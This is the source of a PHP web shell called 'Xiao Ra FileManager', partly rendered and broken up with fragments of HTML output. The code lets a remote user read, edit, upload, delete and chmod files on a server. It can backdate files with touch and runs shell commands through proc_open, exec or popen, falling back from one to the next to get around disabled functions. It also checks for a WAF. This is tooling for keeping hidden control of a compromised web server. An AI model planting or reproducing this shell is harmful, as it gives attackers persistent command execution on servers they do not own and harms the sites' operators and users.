Xiao Ra FileManager

This filemanager created by Maskas
$p"; } function owner($f){ if (function_exists('posix_getpwuid')) { $o=@posix_getpwuid(@fileowner($f)); return $o['name']??'-'; } return @fileowner($f); } /* ================= BREADCRUMB ================= */ function breadcrumb($path){ $parts = explode(DIRECTORY_SEPARATOR, trim($path,DIRECTORY_SEPARATOR)); $build = ''; $out = '/'; foreach($parts as $p){ if($p==='') continue; $build .= DIRECTORY_SEPARATOR.$p; $out .= ' / '.h($p).''; } return $out; } /* ================= RECURSIVE DELETE ================= */ function del_tree($d){ if (is_file($d) || is_link($d)) return @unlink($d); if (!is_dir($d)) return false; foreach (scandir($d) as $i){ if ($i=='.'||$i=='..') continue; del_tree("$d/$i"); } return @rmdir($d); } /* ================= ZIP FOLDER ================= */ function zip_dir($src,$zip){ $z=new ZipArchive; if($z->open($zip,ZipArchive::CREATE)!==TRUE) return; $src=str_replace('\\','/',realpath($src)); $it=new RecursiveIteratorIterator(new RecursiveDirectoryIterator($src)); foreach($it as $f){ if($f->isDir()) continue; $z->addFile($f,str_replace($src.'/','',$f)); } $z->close(); } /* ================= ACTION ================= */ $a=$_GET['a']??''; $f=isset($_GET['f'])?realpath($cwd.'/'.$_GET['f']):''; if ($a === 'mkfile' && !empty($_POST['name'])) { $nf = $cwd.'/'.basename($_POST['name']); if (!file_exists($nf)) fopen($nf,'w'); } if ($a === 'mkdir' && !empty($_POST['name'])) { @mkdir($cwd.'/'.basename($_POST['name']),0755); } if($f && strpos($f,$cwd)===0){ if($a==='delete') del_tree($f); if($a==='chmod' && isset($_POST['perm'])) @chmod($f, octdec($_POST['perm'])); if($a==='touch' && isset($_POST['time'])) @touch($f, strtotime($_POST['time'])); if($a==='rename' && isset($_POST['name'])) @rename($f, $cwd.'/'.basename($_POST['name'])); if($a==='zip' && is_dir($f)) zip_dir($f, $f.'.zip'); if($a==='save' && isset($_POST['c'])) file_put_contents($f, $_POST['c']); } /* ================= COMMAND ================= */ /* ================= COMMAND ================= */ function can_proc_open(){ if (!function_exists('proc_open')) return false; $df = ini_get('disable_functions'); return !($df && stripos($df,'proc_open') !== false); } function can_exec(){ if (!function_exists('exec')) return false; $df = ini_get('disable_functions'); return !($df && stripos($df,'exec') !== false); } function can_popen(){ if (!function_exists('popen')) return false; $df = ini_get('disable_functions'); return !($df && stripos($df,'popen') !== false); } function normalize_cmd($cmd){ $cmd = str_replace(["\\\r\n","\\\n","\r","\n"], ' ', $cmd); return trim(preg_replace('/\s+/', ' ', $cmd)); } function run_cmd($cmd, $cwd){ $out = ''; /* === 1. PROC_OPEN === */ if (can_proc_open()) { $desc = [ 0 => ['pipe','r'], 1 => ['pipe','w'], 2 => ['pipe','w'] ]; $p = @proc_open($cmd, $desc, $pipes, $cwd); if (is_resource($p)) { fclose($pipes[0]); $out = stream_get_contents($pipes[1]); $out .= stream_get_contents($pipes[2]); fclose($pipes[1]); fclose($pipes[2]); proc_close($p); return $out; } } /* === 2. EXEC (INI YANG BIKIN CMD MUNCUL) === */ if (can_exec()) { $buf = []; exec($cmd.' 2>&1', $buf); return implode("\n", $buf); } /* === 3. POPEN === */ if (can_popen()) { $h = @popen($cmd.' 2>&1','r'); if ($h){ while(!feof($h)) $out .= fgets($h); pclose($h); return $out; } } return '[execution disabled]'; } $out = ''; if ($ENABLE_CMD && isset($_POST['cmd'])) { $raw = normalize_cmd($_POST['cmd']); if ($raw !== '') { $parts = preg_split('/\s+/', $raw); $base = $parts[0]; if (in_array($base, $CMD_WHITELIST)) { // find / ps / grep biarkan polos $cmd = in_array($base,['find','ps','grep','egrep','awk','sed']) ? $raw : escapeshellcmd($raw); $out = run_cmd($cmd, $cwd); } else { $out = 'Command not allowed'; } } } /* ================= UPLOAD ================= */ if(!empty($_FILES['up']['name'])) move_uploaded_file($_FILES['up']['tmp_name'],$cwd.'/'.basename($_FILES['up']['name'])); /* ================= LIST FILE ================= */ $dirs=$files=[]; foreach(scandir($cwd) as $i){ if($i=='.') continue; is_dir($i)?$dirs[]=$i:$files[]=$i; } sort($dirs); sort($files); ?> Xiao Ra FileManager

Xiao Ra FileManager

This filemanager created by Maskas

CWD:  [FULL]' : '[SAFE]' ?>
>
⚠ Command execution disabled (WAF detected)
NameOwnerPermModifiedAction
📁 zip | chmod | touch | rename | del
📄 view | edit | chmod | touch | rename | del